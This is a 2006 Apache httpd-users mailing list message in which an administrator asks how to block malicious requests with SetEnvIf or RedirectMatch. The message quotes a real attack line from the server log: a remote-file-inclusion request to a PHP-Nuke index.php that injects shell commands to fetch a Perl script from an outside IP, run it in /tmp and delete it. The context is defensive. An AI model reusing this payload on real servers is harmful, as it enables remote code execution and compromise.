httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From david <dvela...@gmail.com>
Subject [users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch
Date Mon, 07 Aug 2006 23:01:06 GMT
Hello!

Recently, i've founded some entries on my apache webserver log like this:

[IP] - - [05/Aug/2006:02:17:47 +0200] "GET 
/nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*?

HTTP/1.0" 200 220151 "-" "Mozilla/5.0"

As you can see, some attacker tries to use the index.php file to get a 
cmd.txt file from other site.

are there any way to detect this urls to stop this configuring apache?

i've tried with setEnvIf and RedirectMatch on several ways, with no results:

SetEnvIf Request_URI "(.*)cmd(.*)$" attack

or

RewriteEngine on
RedirectMatch permanent (.*)cmd(.*)$ http://nourl

only works with urls like:

http://myserver/myfile.php/cmd

not with

http://myserver/myfile.php?cmd

It seems that te Request_URI and RedirectMatch doesn't works with the 
params on the URL, only with the main URL file.

Thanks.

David



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message